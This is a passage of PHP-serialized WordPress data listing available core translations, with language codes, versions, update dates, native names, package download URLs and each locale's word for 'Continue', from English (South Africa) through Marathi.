Africa)\";s:7:\"package\";s:64:\"https://downloads.wordpress.org/translation/core/6.0.3/en_ZA.zip\";s:3:\"iso\";a:3:{i:1;s:2:\"en\";i:2;s:3:\"eng\";i:3;s:3:\"eng\";}s:7:\"strings\";a:1:{s:8:\"continue\";s:8:\"Continue\";}}s:5:\"en_GB\";a:8:{s:8:\"language\";s:5:\"en_GB\";s:7:\"version\";s:3:\"6.1\";s:7:\"updated\";s:19:\"2022-10-25 14:47:58\";s:12:\"english_name\";s:12:\"English (UK)\";s:11:\"native_name\";s:12:\"English (UK)\";s:7:\"package\";s:62:\"https://downloads.wordpress.org/translation/core/6.1/en_GB.zip\";s:3:\"iso\";a:3:{i:1;s:2:\"en\";i:2;s:3:\"eng\";i:3;s:3:\"eng\";}s:7:\"strings\";a:1:{s:8:\"continue\";s:8:\"Continue\";}}s:5:\"en_AU\";a:8:{s:8:\"language\";s:5:\"en_AU\";s:7:\"version\";s:3:\"6.1\";s:7:\"updated\";s:19:\"2022-10-21 02:51:54\";s:12:\"english_name\";s:19:\"English (Australia)\";s:11:\"native_name\";s:19:\"English (Australia)\";s:7:\"package\";s:62:\"https://downloads.wordpress.org/translation/core/6.1/en_AU.zip\";s:3:\"iso\";a:3:{i:1;s:2:\"en\";i:2;s:3:\"eng\";i:3;s:3:\"eng\";}s:7:\"strings\";a:1:{s:8:\"continue\";s:8:\"Continue\";}}s:5:\"en_NZ\";a:8:{s:8:\"language\";s:5:\"en_NZ\";s:7:\"version\";s:5:\"6.0.3\";s:7:\"updated\";s:19:\"2022-04-01 22:35:34\";s:12:\"english_name\";s:21:\"English (New Zealand)\";s:11:\"native_name\";s:21:\"English (New Zealand)\";s:7:\"package\";s:64:\"https://downloads.wordpress.org/translation/core/6.0.3/en_NZ.zip\";s:3:\"iso\";a:3:{i:1;s:2:\"en\";i:2;s:3:\"eng\";i:3;s:3:\"eng\";}s:7:\"strings\";a:1:{s:8:\"continue\";s:8:\"Continue\";}}s:2:\"eo\";a:8:{s:8:\"language\";s:2:\"eo\";s:7:\"version\";s:3:\"6.1\";s:7:\"updated\";s:19:\"2022-09-29 20:39:44\";s:12:\"english_name\";s:9:\"Esperanto\";s:11:\"native_name\";s:9:\"Esperanto\";s:7:\"package\";s:59:\"https://downloads.wordpress.org/translation/core/6.1/eo.zip\";s:3:\"iso\";a:2:{i:1;s:2:\"eo\";i:2;s:3:\"epo\";}s:7:\"strings\";a:1:{s:8:\"continue\";s:8:\"Daŭrigi\";}}s:5:\"es_MX\";a:8:{s:8:\"language\";s:5:\"es_MX\";s:7:\"version\";s:3:\"6.1\";s:7:\"updated\";s:19:\"2022-11-03 16:27:26\";s:12:\"english_name\";s:16:\"Spanish (Mexico)\";s:11:\"native_name\";s:19:\"Español de México\";s:7:\"package\";s:62:\"https://downloads.wordpress.org/translation/core/6.1/es_MX.zip\";s:3:\"iso\";a:3:{i:1;s:2:\"es\";i:2;s:3:\"spa\";i:3;s:3:\"spa\";}s:7:\"strings\";a:1:{s:8:\"continue\";s:9:\"Continuar\";}}s:5:\"es_VE\";a:8:{s:8:\"language\";s:5:\"es_VE\";s:7:\"version\";s:3:\"6.1\";s:7:\"updated\";s:19:\"2022-07-07 20:37:41\";s:12:\"english_name\";s:19:\"Spanish (Venezuela)\";s:11:\"native_name\";s:21:\"Español de Venezuela\";s:7:\"package\";s:62:\"https://downloads.wordpress.org/translation/core/6.1/es_VE.zip\";s:3:\"iso\";a:3:{i:1;s:2:\"es\";i:2;s:3:\"spa\";i:3;s:3:\"spa\";}s:7:\"strings\";a:1:{s:8:\"continue\";s:9:\"Continuar\";}}s:5:\"es_ES\";a:8:{s:8:\"language\";s:5:\"es_ES\";s:7:\"version\";s:3:\"6.1\";s:7:\"updated\";s:19:\"2022-11-04 13:12:16\";s:12:\"english_name\";s:15:\"Spanish (Spain)\";s:11:\"native_name\";s:8:\"Español\";s:7:\"package\";s:62:\"https://downloads.wordpress.org/translation/core/6.1/es_ES.zip\";s:3:\"iso\";a:3:{i:1;s:2:\"es\";i:2;s:3:\"spa\";i:3;s:3:\"spa\";}s:7:\"strings\";a:1:{s:8:\"continue\";s:9:\"Continuar\";}}s:5:\"es_DO\";a:8:{s:8:\"language\";s:5:\"es_DO\";s:7:\"version\";s:5:\"5.8.6\";s:7:\"updated\";s:19:\"2021-10-08 14:32:50\";s:12:\"english_name\";s:28:\"Spanish (Dominican Republic)\";s:11:\"native_name\";s:33:\"Español de República Dominicana\";s:7:\"package\";s:64:\"https://downloads.wordpress.org/translation/core/5.8.6/es_DO.zip\";s:3:\"iso\";a:3:{i:1;s:2:\"es\";i:2;s:3:\"spa\";i:3;s:3:\"spa\";}s:7:\"strings\";a:1:{s:8:\"continue\";s:9:\"Continuar\";}}s:5:\"es_PE\";a:8:{s:8:\"language\";s:5:\"es_PE\";s:7:\"version\";s:5:\"5.8.6\";s:7:\"updated\";s:19:\"2021-10-04 20:53:18\";s:12:\"english_name\";s:14:\"Spanish (Peru)\";s:11:\"native_name\";s:17:\"Español de Perú\";s:7:\"package\";s:64:\"https://downloads.wordpress.org/translation/core/5.8.6/es_PE.zip\";s:3:\"iso\";a:3:{i:1;s:2:\"es\";i:2;s:3:\"spa\";i:3;s:3:\"spa\";}s:7:\"strings\";a:1:{s:8:\"continue\";s:9:\"Continuar\";}}s:5:\"es_CL\";a:8:{s:8:\"language\";s:5:\"es_CL\";s:7:\"version\";s:8:\"5.8-beta\";s:7:\"updated\";s:19:\"2021-06-14 16:02:22\";s:12:\"english_name\";s:15:\"Spanish (Chile)\";s:11:\"native_name\";s:17:\"Español de Chile\";s:7:\"package\";s:67:\"https://downloads.wordpress.org/translation/core/5.8-beta/es_CL.zip\";s:3:\"iso\";a:3:{i:1;s:2:\"es\";i:2;s:3:\"spa\";i:3;s:3:\"spa\";}s:7:\"strings\";a:1:{s:8:\"continue\";s:9:\"Continuar\";}}s:5:\"es_UY\";a:8:{s:8:\"language\";s:5:\"es_UY\";s:7:\"version\";s:8:\"5.8-beta\";s:7:\"updated\";s:19:\"2021-03-31 18:33:26\";s:12:\"english_name\";s:17:\"Spanish (Uruguay)\";s:11:\"native_name\";s:19:\"Español de Uruguay\";s:7:\"package\";s:67:\"https://downloads.wordpress.org/translation/core/5.8-beta/es_UY.zip\";s:3:\"iso\";a:3:{i:1;s:2:\"es\";i:2;s:3:\"spa\";i:3;s:3:\"spa\";}s:7:\"strings\";a:1:{s:8:\"continue\";s:9:\"Continuar\";}}s:5:\"es_PR\";a:8:{s:8:\"language\";s:5:\"es_PR\";s:7:\"version\";s:6:\"5.4.12\";s:7:\"updated\";s:19:\"2020-04-29 15:36:59\";s:12:\"english_name\";s:21:\"Spanish (Puerto Rico)\";s:11:\"native_name\";s:23:\"Español de Puerto Rico\";s:7:\"package\";s:65:\"https://downloads.wordpress.org/translation/core/5.4.12/es_PR.zip\";s:3:\"iso\";a:3:{i:1;s:2:\"es\";i:2;s:3:\"spa\";i:3;s:3:\"spa\";}s:7:\"strings\";a:1:{s:8:\"continue\";s:9:\"Continuar\";}}s:5:\"es_GT\";a:8:{s:8:\"language\";s:5:\"es_GT\";s:7:\"version\";s:6:\"5.2.17\";s:7:\"updated\";s:19:\"2019-03-02 06:35:01\";s:12:\"english_name\";s:19:\"Spanish (Guatemala)\";s:11:\"native_name\";s:21:\"Español de Guatemala\";s:7:\"package\";s:65:\"https://downloads.wordpress.org/translation/core/5.2.17/es_GT.zip\";s:3:\"iso\";a:3:{i:1;s:2:\"es\";i:2;s:3:\"spa\";i:3;s:3:\"spa\";}s:7:\"strings\";a:1:{s:8:\"continue\";s:9:\"Continuar\";}}s:5:\"es_CO\";a:8:{s:8:\"language\";s:5:\"es_CO\";s:7:\"version\";s:3:\"6.1\";s:7:\"updated\";s:19:\"2022-07-22 14:08:10\";s:12:\"english_name\";s:18:\"Spanish (Colombia)\";s:11:\"native_name\";s:20:\"Español de Colombia\";s:7:\"package\";s:62:\"https://downloads.wordpress.org/translation/core/6.1/es_CO.zip\";s:3:\"iso\";a:3:{i:1;s:2:\"es\";i:2;s:3:\"spa\";i:3;s:3:\"spa\";}s:7:\"strings\";a:1:{s:8:\"continue\";s:9:\"Continuar\";}}s:5:\"es_AR\";a:8:{s:8:\"language\";s:5:\"es_AR\";s:7:\"version\";s:3:\"6.1\";s:7:\"updated\";s:19:\"2022-11-07 07:27:03\";s:12:\"english_name\";s:19:\"Spanish (Argentina)\";s:11:\"native_name\";s:21:\"Español de Argentina\";s:7:\"package\";s:62:\"https://downloads.wordpress.org/translation/core/6.1/es_AR.zip\";s:3:\"iso\";a:3:{i:1;s:2:\"es\";i:2;s:3:\"spa\";i:3;s:3:\"spa\";}s:7:\"strings\";a:1:{s:8:\"continue\";s:9:\"Continuar\";}}s:5:\"es_CR\";a:8:{s:8:\"language\";s:5:\"es_CR\";s:7:\"version\";s:3:\"6.1\";s:7:\"updated\";s:19:\"2022-11-06 17:58:56\";s:12:\"english_name\";s:20:\"Spanish (Costa Rica)\";s:11:\"native_name\";s:22:\"Español de Costa Rica\";s:7:\"package\";s:62:\"https://downloads.wordpress.org/translation/core/6.1/es_CR.zip\";s:3:\"iso\";a:3:{i:1;s:2:\"es\";i:2;s:3:\"spa\";i:3;s:3:\"spa\";}s:7:\"strings\";a:1:{s:8:\"continue\";s:9:\"Continuar\";}}s:5:\"es_EC\";a:8:{s:8:\"language\";s:5:\"es_EC\";s:7:\"version\";s:3:\"6.1\";s:7:\"updated\";s:19:\"2022-08-01 00:22:12\";s:12:\"english_name\";s:17:\"Spanish (Ecuador)\";s:11:\"native_name\";s:19:\"Español de Ecuador\";s:7:\"package\";s:62:\"https://downloads.wordpress.org/translation/core/6.1/es_EC.zip\";s:3:\"iso\";a:3:{i:1;s:2:\"es\";i:2;s:3:\"spa\";i:3;s:3:\"spa\";}s:7:\"strings\";a:1:{s:8:\"continue\";s:9:\"Continuar\";}}s:2:\"et\";a:8:{s:8:\"language\";s:2:\"et\";s:7:\"version\";s:8:\"5.8-beta\";s:7:\"updated\";s:19:\"2020-08-12 08:38:59\";s:12:\"english_name\";s:8:\"Estonian\";s:11:\"native_name\";s:5:\"Eesti\";s:7:\"package\";s:64:\"https://downloads.wordpress.org/translation/core/5.8-beta/et.zip\";s:3:\"iso\";a:2:{i:1;s:2:\"et\";i:2;s:3:\"est\";}s:7:\"strings\";a:1:{s:8:\"continue\";s:6:\"Jätka\";}}s:2:\"eu\";a:8:{s:8:\"language\";s:2:\"eu\";s:7:\"version\";s:3:\"6.1\";s:7:\"updated\";s:19:\"2022-10-30 21:22:35\";s:12:\"english_name\";s:6:\"Basque\";s:11:\"native_name\";s:7:\"Euskara\";s:7:\"package\";s:59:\"https://downloads.wordpress.org/translation/core/6.1/eu.zip\";s:3:\"iso\";a:2:{i:1;s:2:\"eu\";i:2;s:3:\"eus\";}s:7:\"strings\";a:1:{s:8:\"continue\";s:8:\"Jarraitu\";}}s:5:\"fa_AF\";a:8:{s:8:\"language\";s:5:\"fa_AF\";s:7:\"version\";s:3:\"6.1\";s:7:\"updated\";s:19:\"2022-11-07 02:53:22\";s:12:\"english_name\";s:21:\"Persian (Afghanistan)\";s:11:\"native_name\";s:31:\"(فارسی (افغانستان\";s:7:\"package\";s:62:\"https://downloads.wordpress.org/translation/core/6.1/fa_AF.zip\";s:3:\"iso\";a:2:{i:1;s:2:\"fa\";i:2;s:3:\"fas\";}s:7:\"strings\";a:1:{s:8:\"continue\";s:10:\"ادامه\";}}s:5:\"fa_IR\";a:8:{s:8:\"language\";s:5:\"fa_IR\";s:7:\"version\";s:3:\"6.1\";s:7:\"updated\";s:19:\"2022-10-24 17:20:36\";s:12:\"english_name\";s:7:\"Persian\";s:11:\"native_name\";s:10:\"فارسی\";s:7:\"package\";s:62:\"https://downloads.wordpress.org/translation/core/6.1/fa_IR.zip\";s:3:\"iso\";a:2:{i:1;s:2:\"fa\";i:2;s:3:\"fas\";}s:7:\"strings\";a:1:{s:8:\"continue\";s:10:\"ادامه\";}}s:2:\"fi\";a:8:{s:8:\"language\";s:2:\"fi\";s:7:\"version\";s:3:\"6.1\";s:7:\"updated\";s:19:\"2022-10-26 17:27:26\";s:12:\"english_name\";s:7:\"Finnish\";s:11:\"native_name\";s:5:\"Suomi\";s:7:\"package\";s:59:\"https://downloads.wordpress.org/translation/core/6.1/fi.zip\";s:3:\"iso\";a:2:{i:1;s:2:\"fi\";i:2;s:3:\"fin\";}s:7:\"strings\";a:1:{s:8:\"continue\";s:5:\"Jatka\";}}s:5:\"fr_FR\";a:8:{s:8:\"language\";s:5:\"fr_FR\";s:7:\"version\";s:3:\"6.1\";s:7:\"updated\";s:19:\"2022-11-03 14:47:53\";s:12:\"english_name\";s:15:\"French (France)\";s:11:\"native_name\";s:9:\"Français\";s:7:\"package\";s:62:\"https://downloads.wordpress.org/translation/core/6.1/fr_FR.zip\";s:3:\"iso\";a:1:{i:1;s:2:\"fr\";}s:7:\"strings\";a:1:{s:8:\"continue\";s:9:\"Continuer\";}}s:5:\"fr_CA\";a:8:{s:8:\"language\";s:5:\"fr_CA\";s:7:\"version\";s:3:\"6.1\";s:7:\"updated\";s:19:\"2022-11-06 16:00:35\";s:12:\"english_name\";s:15:\"French (Canada)\";s:11:\"native_name\";s:19:\"Français du Canada\";s:7:\"package\";s:62:\"https://downloads.wordpress.org/translation/core/6.1/fr_CA.zip\";s:3:\"iso\";a:2:{i:1;s:2:\"fr\";i:2;s:3:\"fra\";}s:7:\"strings\";a:1:{s:8:\"continue\";s:9:\"Continuer\";}}s:5:\"fr_BE\";a:8:{s:8:\"language\";s:5:\"fr_BE\";s:7:\"version\";s:8:\"5.8-beta\";s:7:\"updated\";s:19:\"2021-02-22 13:54:46\";s:12:\"english_name\";s:16:\"French (Belgium)\";s:11:\"native_name\";s:21:\"Français de Belgique\";s:7:\"package\";s:67:\"https://downloads.wordpress.org/translation/core/5.8-beta/fr_BE.zip\";s:3:\"iso\";a:2:{i:1;s:2:\"fr\";i:2;s:3:\"fra\";}s:7:\"strings\";a:1:{s:8:\"continue\";s:9:\"Continuer\";}}s:3:\"fur\";a:8:{s:8:\"language\";s:3:\"fur\";s:7:\"version\";s:6:\"4.8.21\";s:7:\"updated\";s:19:\"2018-01-29 17:32:35\";s:12:\"english_name\";s:8:\"Friulian\";s:11:\"native_name\";s:8:\"Friulian\";s:7:\"package\";s:63:\"https://downloads.wordpress.org/translation/core/4.8.21/fur.zip\";s:3:\"iso\";a:2:{i:2;s:3:\"fur\";i:3;s:3:\"fur\";}s:7:\"strings\";a:1:{s:8:\"continue\";s:8:\"Continue\";}}s:2:\"gd\";a:8:{s:8:\"language\";s:2:\"gd\";s:7:\"version\";s:5:\"4.7.2\";s:7:\"updated\";s:19:\"2016-08-23 17:41:37\";s:12:\"english_name\";s:15:\"Scottish Gaelic\";s:11:\"native_name\";s:9:\"Gàidhlig\";s:7:\"package\";s:61:\"https://downloads.wordpress.org/translation/core/4.7.2/gd.zip\";s:3:\"iso\";a:3:{i:1;s:2:\"gd\";i:2;s:3:\"gla\";i:3;s:3:\"gla\";}s:7:\"strings\";a:1:{s:8:\"continue\";s:15:\"Lean air adhart\";}}s:5:\"gl_ES\";a:8:{s:8:\"language\";s:5:\"gl_ES\";s:7:\"version\";s:3:\"6.1\";s:7:\"updated\";s:19:\"2022-11-02 08:14:13\";s:12:\"english_name\";s:8:\"Galician\";s:11:\"native_name\";s:6:\"Galego\";s:7:\"package\";s:62:\"https://downloads.wordpress.org/translation/core/6.1/gl_ES.zip\";s:3:\"iso\";a:2:{i:1;s:2:\"gl\";i:2;s:3:\"glg\";}s:7:\"strings\";a:1:{s:8:\"continue\";s:9:\"Continuar\";}}s:2:\"gu\";a:8:{s:8:\"language\";s:2:\"gu\";s:7:\"version\";s:6:\"4.9.22\";s:7:\"updated\";s:19:\"2018-09-14 12:33:48\";s:12:\"english_name\";s:8:\"Gujarati\";s:11:\"native_name\";s:21:\"ગુજરાતી\";s:7:\"package\";s:62:\"https://downloads.wordpress.org/translation/core/4.9.22/gu.zip\";s:3:\"iso\";a:2:{i:1;s:2:\"gu\";i:2;s:3:\"guj\";}s:7:\"strings\";a:1:{s:8:\"continue\";s:31:\"ચાલુ રાખવું\";}}s:3:\"haz\";a:8:{s:8:\"language\";s:3:\"haz\";s:7:\"version\";s:6:\"4.4.29\";s:7:\"updated\";s:19:\"2015-12-05 00:59:09\";s:12:\"english_name\";s:8:\"Hazaragi\";s:11:\"native_name\";s:15:\"هزاره گی\";s:7:\"package\";s:63:\"https://downloads.wordpress.org/translation/core/4.4.29/haz.zip\";s:3:\"iso\";a:1:{i:3;s:3:\"haz\";}s:7:\"strings\";a:1:{s:8:\"continue\";s:10:\"ادامه\";}}s:5:\"he_IL\";a:8:{s:8:\"language\";s:5:\"he_IL\";s:7:\"version\";s:3:\"6.1\";s:7:\"updated\";s:19:\"2022-11-02 09:16:06\";s:12:\"english_name\";s:6:\"Hebrew\";s:11:\"native_name\";s:16:\"עִבְרִית\";s:7:\"package\";s:62:\"https://downloads.wordpress.org/translation/core/6.1/he_IL.zip\";s:3:\"iso\";a:1:{i:1;s:2:\"he\";}s:7:\"strings\";a:1:{s:8:\"continue\";s:8:\"המשך\";}}s:5:\"hi_IN\";a:8:{s:8:\"language\";s:5:\"hi_IN\";s:7:\"version\";s:6:\"5.4.12\";s:7:\"updated\";s:19:\"2020-11-06 12:34:38\";s:12:\"english_name\";s:5:\"Hindi\";s:11:\"native_name\";s:18:\"हिन्दी\";s:7:\"package\";s:65:\"https://downloads.wordpress.org/translation/core/5.4.12/hi_IN.zip\";s:3:\"iso\";a:2:{i:1;s:2:\"hi\";i:2;s:3:\"hin\";}s:7:\"strings\";a:1:{s:8:\"continue\";s:25:\"जारी रखें\";}}s:2:\"hr\";a:8:{s:8:\"language\";s:2:\"hr\";s:7:\"version\";s:3:\"6.1\";s:7:\"updated\";s:19:\"2022-11-03 08:41:34\";s:12:\"english_name\";s:8:\"Croatian\";s:11:\"native_name\";s:8:\"Hrvatski\";s:7:\"package\";s:59:\"https://downloads.wordpress.org/translation/core/6.1/hr.zip\";s:3:\"iso\";a:2:{i:1;s:2:\"hr\";i:2;s:3:\"hrv\";}s:7:\"strings\";a:1:{s:8:\"continue\";s:7:\"Nastavi\";}}s:3:\"hsb\";a:8:{s:8:\"language\";s:3:\"hsb\";s:7:\"version\";s:3:\"6.1\";s:7:\"updated\";s:19:\"2022-07-18 19:40:10\";s:12:\"english_name\";s:13:\"Upper Sorbian\";s:11:\"native_name\";s:17:\"Hornjoserbšćina\";s:7:\"package\";s:60:\"https://downloads.wordpress.org/translation/core/6.1/hsb.zip\";s:3:\"iso\";a:2:{i:2;s:3:\"hsb\";i:3;s:3:\"hsb\";}s:7:\"strings\";a:1:{s:8:\"continue\";s:4:\"Dale\";}}s:5:\"hu_HU\";a:8:{s:8:\"language\";s:5:\"hu_HU\";s:7:\"version\";s:3:\"6.1\";s:7:\"updated\";s:19:\"2022-11-07 13:33:18\";s:12:\"english_name\";s:9:\"Hungarian\";s:11:\"native_name\";s:6:\"Magyar\";s:7:\"package\";s:62:\"https://downloads.wordpress.org/translation/core/6.1/hu_HU.zip\";s:3:\"iso\";a:2:{i:1;s:2:\"hu\";i:2;s:3:\"hun\";}s:7:\"strings\";a:1:{s:8:\"continue\";s:10:\"Folytatás\";}}s:2:\"hy\";a:8:{s:8:\"language\";s:2:\"hy\";s:7:\"version\";s:5:\"4.7.2\";s:7:\"updated\";s:19:\"2016-12-03 16:21:10\";s:12:\"english_name\";s:8:\"Armenian\";s:11:\"native_name\";s:14:\"Հայերեն\";s:7:\"package\";s:61:\"https://downloads.wordpress.org/translation/core/4.7.2/hy.zip\";s:3:\"iso\";a:2:{i:1;s:2:\"hy\";i:2;s:3:\"hye\";}s:7:\"strings\";a:1:{s:8:\"continue\";s:20:\"Շարունակել\";}}s:5:\"id_ID\";a:8:{s:8:\"language\";s:5:\"id_ID\";s:7:\"version\";s:3:\"6.1\";s:7:\"updated\";s:19:\"2022-11-02 03:09:22\";s:12:\"english_name\";s:10:\"Indonesian\";s:11:\"native_name\";s:16:\"Bahasa Indonesia\";s:7:\"package\";s:62:\"https://downloads.wordpress.org/translation/core/6.1/id_ID.zip\";s:3:\"iso\";a:2:{i:1;s:2:\"id\";i:2;s:3:\"ind\";}s:7:\"strings\";a:1:{s:8:\"continue\";s:9:\"Lanjutkan\";}}s:5:\"is_IS\";a:8:{s:8:\"language\";s:5:\"is_IS\";s:7:\"version\";s:6:\"4.9.22\";s:7:\"updated\";s:19:\"2018-12-11 10:40:02\";s:12:\"english_name\";s:9:\"Icelandic\";s:11:\"native_name\";s:9:\"Íslenska\";s:7:\"package\";s:65:\"https://downloads.wordpress.org/translation/core/4.9.22/is_IS.zip\";s:3:\"iso\";a:2:{i:1;s:2:\"is\";i:2;s:3:\"isl\";}s:7:\"strings\";a:1:{s:8:\"continue\";s:6:\"Áfram\";}}s:5:\"it_IT\";a:8:{s:8:\"language\";s:5:\"it_IT\";s:7:\"version\";s:3:\"6.1\";s:7:\"updated\";s:19:\"2022-11-02 10:05:34\";s:12:\"english_name\";s:7:\"Italian\";s:11:\"native_name\";s:8:\"Italiano\";s:7:\"package\";s:62:\"https://downloads.wordpress.org/translation/core/6.1/it_IT.zip\";s:3:\"iso\";a:2:{i:1;s:2:\"it\";i:2;s:3:\"ita\";}s:7:\"strings\";a:1:{s:8:\"continue\";s:8:\"Continua\";}}s:2:\"ja\";a:8:{s:8:\"language\";s:2:\"ja\";s:7:\"version\";s:3:\"6.1\";s:7:\"updated\";s:19:\"2022-11-02 02:42:55\";s:12:\"english_name\";s:8:\"Japanese\";s:11:\"native_name\";s:9:\"日本語\";s:7:\"package\";s:59:\"https://downloads.wordpress.org/translation/core/6.1/ja.zip\";s:3:\"iso\";a:1:{i:1;s:2:\"ja\";}s:7:\"strings\";a:1:{s:8:\"continue\";s:6:\"次へ\";}}s:5:\"jv_ID\";a:8:{s:8:\"language\";s:5:\"jv_ID\";s:7:\"version\";s:6:\"4.9.22\";s:7:\"updated\";s:19:\"2019-02-16 23:58:56\";s:12:\"english_name\";s:8:\"Javanese\";s:11:\"native_name\";s:9:\"Basa Jawa\";s:7:\"package\";s:65:\"https://downloads.wordpress.org/translation/core/4.9.22/jv_ID.zip\";s:3:\"iso\";a:2:{i:1;s:2:\"jv\";i:2;s:3:\"jav\";}s:7:\"strings\";a:1:{s:8:\"continue\";s:9:\"Nerusaké\";}}s:5:\"ka_GE\";a:8:{s:8:\"language\";s:5:\"ka_GE\";s:7:\"version\";s:5:\"6.0.3\";s:7:\"updated\";s:19:\"2022-10-24 08:01:09\";s:12:\"english_name\";s:8:\"Georgian\";s:11:\"native_name\";s:21:\"ქართული\";s:7:\"package\";s:64:\"https://downloads.wordpress.org/translation/core/6.0.3/ka_GE.zip\";s:3:\"iso\";a:2:{i:1;s:2:\"ka\";i:2;s:3:\"kat\";}s:7:\"strings\";a:1:{s:8:\"continue\";s:30:\"გაგრძელება\";}}s:3:\"kab\";a:8:{s:8:\"language\";s:3:\"kab\";s:7:\"version\";s:3:\"6.1\";s:7:\"updated\";s:19:\"2022-11-04 12:58:16\";s:12:\"english_name\";s:6:\"Kabyle\";s:11:\"native_name\";s:9:\"Taqbaylit\";s:7:\"package\";s:60:\"https://downloads.wordpress.org/translation/core/6.1/kab.zip\";s:3:\"iso\";a:2:{i:2;s:3:\"kab\";i:3;s:3:\"kab\";}s:7:\"strings\";a:1:{s:8:\"continue\";s:6:\"Kemmel\";}}s:2:\"kk\";a:8:{s:8:\"language\";s:2:\"kk\";s:7:\"version\";s:6:\"4.9.22\";s:7:\"updated\";s:19:\"2018-07-10 11:35:44\";s:12:\"english_name\";s:6:\"Kazakh\";s:11:\"native_name\";s:19:\"Қазақ тілі\";s:7:\"package\";s:62:\"https://downloads.wordpress.org/translation/core/4.9.22/kk.zip\";s:3:\"iso\";a:2:{i:1;s:2:\"kk\";i:2;s:3:\"kaz\";}s:7:\"strings\";a:1:{s:8:\"continue\";s:20:\"Жалғастыру\";}}s:2:\"km\";a:8:{s:8:\"language\";s:2:\"km\";s:7:\"version\";s:6:\"5.2.17\";s:7:\"updated\";s:19:\"2019-06-10 16:18:28\";s:12:\"english_name\";s:5:\"Khmer\";s:11:\"native_name\";s:27:\"ភាសាខ្មែរ\";s:7:\"package\";s:62:\"https://downloads.wordpress.org/translation/core/5.2.17/km.zip\";s:3:\"iso\";a:2:{i:1;s:2:\"km\";i:2;s:3:\"khm\";}s:7:\"strings\";a:1:{s:8:\"continue\";s:12:\"បន្ត\";}}s:2:\"kn\";a:8:{s:8:\"language\";s:2:\"kn\";s:7:\"version\";s:3:\"6.1\";s:7:\"updated\";s:19:\"2022-10-20 17:15:28\";s:12:\"english_name\";s:7:\"Kannada\";s:11:\"native_name\";s:15:\"ಕನ್ನಡ\";s:7:\"package\";s:59:\"https://downloads.wordpress.org/translation/core/6.1/kn.zip\";s:3:\"iso\";a:2:{i:1;s:2:\"kn\";i:2;s:3:\"kan\";}s:7:\"strings\";a:1:{s:8:\"continue\";s:30:\"ಮುಂದುವರಿಸು\";}}s:5:\"ko_KR\";a:8:{s:8:\"language\";s:5:\"ko_KR\";s:7:\"version\";s:3:\"6.1\";s:7:\"updated\";s:19:\"2022-10-26 10:32:24\";s:12:\"english_name\";s:6:\"Korean\";s:11:\"native_name\";s:9:\"한국어\";s:7:\"package\";s:62:\"https://downloads.wordpress.org/translation/core/6.1/ko_KR.zip\";s:3:\"iso\";a:2:{i:1;s:2:\"ko\";i:2;s:3:\"kor\";}s:7:\"strings\";a:1:{s:8:\"continue\";s:6:\"계속\";}}s:3:\"ckb\";a:8:{s:8:\"language\";s:3:\"ckb\";s:7:\"version\";s:5:\"5.8.6\";s:7:\"updated\";s:19:\"2021-12-07 16:32:30\";s:12:\"english_name\";s:16:\"Kurdish (Sorani)\";s:11:\"native_name\";s:13:\"كوردی‎\";s:7:\"package\";s:62:\"https://downloads.wordpress.org/translation/core/5.8.6/ckb.zip\";s:3:\"iso\";a:2:{i:1;s:2:\"ku\";i:3;s:3:\"ckb\";}s:7:\"strings\";a:1:{s:8:\"continue\";s:30:\"به‌رده‌وام به‌\";}}s:2:\"lo\";a:8:{s:8:\"language\";s:2:\"lo\";s:7:\"version\";s:5:\"4.7.2\";s:7:\"updated\";s:19:\"2016-11-12 09:59:23\";s:12:\"english_name\";s:3:\"Lao\";s:11:\"native_name\";s:21:\"ພາສາລາວ\";s:7:\"package\";s:61:\"https://downloads.wordpress.org/translation/core/4.7.2/lo.zip\";s:3:\"iso\";a:2:{i:1;s:2:\"lo\";i:2;s:3:\"lao\";}s:7:\"strings\";a:1:{s:8:\"continue\";s:18:\"ຕໍ່​ໄປ\";}}s:5:\"lt_LT\";a:8:{s:8:\"language\";s:5:\"lt_LT\";s:7:\"version\";s:3:\"6.1\";s:7:\"updated\";s:19:\"2022-11-01 13:10:23\";s:12:\"english_name\";s:10:\"Lithuanian\";s:11:\"native_name\";s:15:\"Lietuvių kalba\";s:7:\"package\";s:62:\"https://downloads.wordpress.org/translation/core/6.1/lt_LT.zip\";s:3:\"iso\";a:2:{i:1;s:2:\"lt\";i:2;s:3:\"lit\";}s:7:\"strings\";a:1:{s:8:\"continue\";s:6:\"Tęsti\";}}s:2:\"lv\";a:8:{s:8:\"language\";s:2:\"lv\";s:7:\"version\";s:3:\"6.1\";s:7:\"updated\";s:19:\"2022-11-03 17:14:10\";s:12:\"english_name\";s:7:\"Latvian\";s:11:\"native_name\";s:16:\"Latviešu valoda\";s:7:\"package\";s:59:\"https://downloads.wordpress.org/translation/core/6.1/lv.zip\";s:3:\"iso\";a:2:{i:1;s:2:\"lv\";i:2;s:3:\"lav\";}s:7:\"strings\";a:1:{s:8:\"continue\";s:9:\"Turpināt\";}}s:5:\"mk_MK\";a:8:{s:8:\"language\";s:5:\"mk_MK\";s:7:\"version\";s:5:\"6.0.3\";s:7:\"updated\";s:19:\"2022-10-01 09:23:52\";s:12:\"english_name\";s:10:\"Macedonian\";s:11:\"native_name\";s:31:\"Македонски јазик\";s:7:\"package\";s:64:\"https://downloads.wordpress.org/translation/core/6.0.3/mk_MK.zip\";s:3:\"iso\";a:2:{i:1;s:2:\"mk\";i:2;s:3:\"mkd\";}s:7:\"strings\";a:1:{s:8:\"continue\";s:16:\"Продолжи\";}}s:5:\"ml_IN\";a:8:{s:8:\"language\";s:5:\"ml_IN\";s:7:\"version\";s:5:\"4.7.2\";s:7:\"updated\";s:19:\"2017-01-27 03:43:32\";s:12:\"english_name\";s:9:\"Malayalam\";s:11:\"native_name\";s:18:\"മലയാളം\";s:7:\"package\";s:64:\"https://downloads.wordpress.org/translation/core/4.7.2/ml_IN.zip\";s:3:\"iso\";a:2:{i:1;s:2:\"ml\";i:2;s:3:\"mal\";}s:7:\"strings\";a:1:{s:8:\"continue\";s:18:\"തുടരുക\";}}s:2:\"mn\";a:8:{s:8:\"language\";s:2:\"mn\";s:7:\"version\";s:5:\"4.7.2\";s:7:\"updated\";s:19:\"2017-01-12 07:29:35\";s:12:\"english_name\";s:9:\"Mongolian\";s:11:\"native_name\";s:12:\"Монгол\";s:7:\"package\";s:61:\"https://downloads.wordpress.org/translation/core/4.7.2/mn.zip\";s:3:\"iso\";a:2:{i:1;s:2:\"mn\";i:2;s:3:\"mon\";}s:7:\"strings\";a:1:{s:8:\"continue\";s:24:\"Үргэлжлүүлэх\";}}s:2:\"mr\";a:8:{s:8:\"language\";s:2:\"mr\";s:7:\"version\";s:6:\"4.9.22\";s:7:\"updated\";s:19:\"2019-11-22 